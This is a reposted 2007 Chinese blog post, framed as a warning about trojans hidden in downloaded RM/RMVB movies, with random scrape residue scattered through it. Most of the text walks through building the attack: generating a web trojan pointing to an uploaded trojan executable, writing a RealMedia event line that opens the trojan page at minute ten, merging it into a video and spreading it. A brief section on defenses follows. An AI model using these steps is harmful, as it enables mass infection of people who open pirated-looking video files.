对教程网越来越有感情,由喜欢慢慢变成了爱。虽然付出了很多,也很辛苦,可是它带给我更多的是快乐,希望会有越来越多的人喜欢并且爱上这里!

(转)下载电影时谨防木马入侵

上一篇 / 下一篇  2007-12-27 17:55:05 / 个人分类:计算机基础知识

查看( 71 ) / 评论( 1 )
  时至岁末,各种各样的贺岁片纷纷出炉,这也是黑客利用夹带网页木马的RM/RMVB电影文件捕捉肉鸡的好时节,许多人纷纷中招。那么黑客是怎么把网页木马加入RM/RMVB电影中的呢?中国教程网--个人空间#F z5`t7P\%FE
中国教程网--个人空间:Fw*{Ws
  1.RM/RMVB唯一能夹带网页木马的格式
k's4P7E5k W(g0中国教程网--个人空间8Dw#zs.{
  在所有电影格式里面,为什么就只有RM/RMVB就夹带网页木马呢?这与该格式的发布者Real公司有关。Real公司允许在RM/RMVB格式的文件里,插入用户设置的任意网页链接来进行广告宣传,当这些网页链接被打开时默认使用的是Real公司的浏览器。
M\!tww1X p0
Gn#Md*H0  可是没想到这种方法,没有给Real公司带来多少实际利益,却为黑客提供了一种方便的网页木马传播手段。只需要将网页木马的链接添加在RM/RMVB里面,当用户打开时就会中招。
}7J$t0X:R2N0
0FFp^:T2g*~R)V0  小提示:其他电影格式就只能用捆绑木马的方式传播。
8jF av;R'St0
k-x7c%@1a.Uv{}0  2.网马捆绑RM并不难中国教程网--个人空间%c,A8h+~R I@K x

1B2Db&? KMy0  第一步:制作网页木马中国教程网--个人空间'a|}'X'p
  首先准备好一个木马的服务端程序,将它上传到网络空间里面,得到一个服务端文件的链接。现在利用最新的MCAfee网页木马生成器来创建一个网页木马。先打开系统的命令提示符窗口,在窗口切换到生成器所在的目录,比如输入“cd d:”就可以进入D盘。中国教程网--个人空间uT6s$Y0jJ\Qg)u'R
  接着执行命令:McAfee [生成HTML文件名],我们按照程序的提示要求输入:McAfee http://www.mm.Com/mm.exe cs.Html(如图1),既可以在程序目录创建一个网页木马。现在将生成的网页木马上传到网页空间即可。
M6L6i yu(K f-B m0中国教程网--个人空间 EU eQ \ OmZ:`

中国教程网--个人空间}`3M#\p;p

创建一个网页木马中国教程网--个人空间1m k&V;|:R4q

中国教程网--个人空间%]j5D)ENUw

f5XHO x0  第二步:制作时间文件
3@%[ n3|~0
5D.?n0qQ(}0  打开记事本程序,在其中输入下面的一段代码:u 00:10:00.0 00:11:00.0 http://www.mm.Com/cs.Html(如图2)。这段代码的意思是在影片的第10分钟到11分钟的时候,打开后面的“http: //www.mm.Com/cs.Html”的这个网页链接,这个网页链接就是我们刚刚设置的网页木马的地址,然后将它保存为一个任意名称的文本文件。
A{k[)|1}0
SN4q-aG(_0

Qup*IE)s3d6u#L0

用记事本输入代码中国教程网--个人空间3D9|L@2u1D


.b2s8qb2~"wR|0中国教程网--个人空间 NOj{&c,K'pe
  第三步:制作网马RM中国教程网--个人空间 cf4N DI%xi
中国教程网--个人空间2n i8b'JQX2Pz&jEv5^
  准备一段RM或RMVB视频文件以及相关的视频编辑工具RealMedia Editor。接着启动编辑程序,点击“文件”菜单下的“打开Real媒体文件”命令,来打开准备好的那段RM/RMVB视频文件。
h3nj9tG1B$Jk0
G9h0MPQ3c0  然后点击“工具”菜单下的“合并事件”命令,再选择刚才制作的那个文本文件。最后点击“文件”菜单下的“RealMedia文件另存为”命令,对这个合并的文件重新进行另存为操作即可(如图3)。现在将这个恶意的RM文件传播出去,当人们观看这个RM/RMVB文件后,就可能通过网页木马植入木马程序。
$l cLq ib lqm0


(B"{+lG2c0中国教程网--个人空间M1u S[3O-E~-B\#u

制作恶意的RM文件

$m x/DQ"W)I0
l)[ eL!tyJ0
e^;B*QT&UoQ0中国教程网--个人空间d0sw6~5](B H
  3.防范方法中国教程网--个人空间O!w k {(pQ

t@1qNL,ry0  当RM或RMVB文件下载到本队以后,可以通过“超级兔子RM广告清除器”对文件进行扫描。运行“超级兔子RM广告清除器”,在“输入要去除广告的文件名”中选择RM文件,再在“输入新生成的文件名”设置除掉网页广告或木马后的RM文件,然后点击“开始清除”按钮就会进行扫描(如图4)。如果发现广告信息或木马信息,就会自动清除并弹出一个对话框提示用户。其实最简单方法就是下载完成后,断掉网络再进行文件的观看。中国教程网--个人空间F"v N,U7J8U u

H5D9C8PrgR%I0

功能强大的超级兔子

q ln!]8H6w^0
m9AN3\%K(l0
+woF\,g d vF$a0
%U1d@Kv8V6Sa {I9B0  对于那些嵌入到网页中的RM/RMVB文件,首先用户需要安装最新的系统,以及应用程序的补丁程序。这样网页木马就不能激活漏洞来下载安装木马程序,也可以通过IE卫士、金山清理专家、瑞星卡卡的网页木马拦截功能,对这些文件中可能存在的网页木马进行拦截。
`9ed-{C%I0
il `\ _0  总结
Ra\ pUq9j f0  利用RM/RMVB文件进行网页木马传播,已经是一种非常古老的方法了,但是我们不得不承认它的确是非常有效的。在年终,黑客会制作带网页木马的RM/RMVB热门贺岁片,大肆传播,这阵现象将在最近持续一段时间,大家下载电影的时候多留心一下。

TAG:

danifo发布于2008-01-24 19:36:54
还好 我一般用迅雷下载的时候都点上 从原地址下载~
我来说两句

(可选)

Open Toolbar